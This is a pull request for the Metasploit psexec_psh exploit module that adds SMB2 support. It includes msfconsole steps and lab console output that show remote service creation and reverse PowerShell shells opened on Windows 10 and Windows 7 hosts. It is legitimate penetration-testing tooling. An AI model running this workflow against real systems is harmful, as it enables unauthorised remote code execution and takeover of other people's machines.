### PR TITLE
Added line in psexec_psh to support SMB2

### DIFF
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -81,6 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Try and authenticate with given credentials
     if connect
       begin
+        connect(versions: [2,1])
         smb_login
       rescue StandardError => autherror
         fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")


### PR DESCRIPTION
I was fiddling with powershell stuff and realized we don't support psexec_psh on SMBv2.  This just adds the line above the smb_login call to support smbv2.  It seems to work.

## Verification

List the steps needed to make sure this thing works

Do the following on Win10 1803 and win 7 SP0:

- [x] Start `msfconsole`
- [x] `use exploit/windows/smb/psexec_psh`
- [x] `set rhost <...>`
- [x] `set smbuser <...>`
- [x] `set smbpass <...>`
- [x] `set payload <...>`
- [x] `set [L|R]host`
- [x] `set [L|R]port`
- [x] `run`
- [x] Get shells and profit

## Examples:
Windows 10x64 1803 Old and busted:
```
msf5 exploit(windows/smb/psexec_psh) > run

[*] Started reverse SSL handler on 192.168.135.111:4555 
[*] 192.168.132.184:445 - Powershell command length: 4345
[-] 192.168.132.184:445 - Exploit aborted due to failure: no-access: 192.168.132.184:445 - Unable to authenticate with given credentials: Login Failed: Connection reset by peer
[*] Exploit completed, but no session was created.
```
Windows 10x64 1803 New and Shiny:
```
msf5 exploit(windows/smb/psexec_psh) > run

[*] Started reverse SSL handler on 192.168.135.111:4555 
[*] 192.168.132.184:445 - Powershell command length: 4341
[*] 192.168.132.184:445 - Executing the payload...
[*] 192.168.132.184:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.132.184[\svcctl] ...
[*] 192.168.132.184:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.132.184[\svcctl] ...
[*] 192.168.132.184:445 - Obtaining a service manager handle...
[*] 192.168.132.184:445 - Creating the service...
[+] 192.168.132.184:445 - Successfully created the service
[*] 192.168.132.184:445 - Starting the service...
[+] 192.168.132.184:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.132.184:445 - Removing the service...
[+] 192.168.132.184:445 - Successfully removed the service
[*] 192.168.132.184:445 - Closing service handle...
^C[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec_psh) > sessions -l -1

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  2         powershell win               192.168.135.111:4555 -> 192.168.132.184:49676 (192.168.132.184)

msf5 exploit(windows/smb/psexec_psh) > sessions -i -1
[*] Starting interaction with 2...

Windows PowerShell running as user WIN10X64_1803$ on WIN10X64_1803
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>
```

Windows 7 still works:
```
msf5 exploit(windows/smb/psexec_psh) > run

[*] Started reverse SSL handler on 192.168.135.111:4569 
[*] 192.168.132.175:445 - Executing the payload...
[+] 192.168.132.175:445 - Service start timed out, OK if running a command or non-service executable...
^C[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec_psh) > sessions -l

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         powershell win               192.168.135.111:4569 -> 192.168.132.175:49161 (192.168.132.175)

msf5 exploit(windows/smb/psexec_psh) > sessions -i -1
[*] Starting interaction with 1...

Windows PowerShell running as user WIN7X64$ on WIN7X64
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : moose
   Link-local IPv6 Address . . . . . : fe80::f49f:afcd:7452:ab96%11
   IPv4 Address. . . . . . . . . . . : 192.168.132.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.132.254

Tunnel adapter isatap.moose:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : moose
PS C:\Windows\system32> 

```
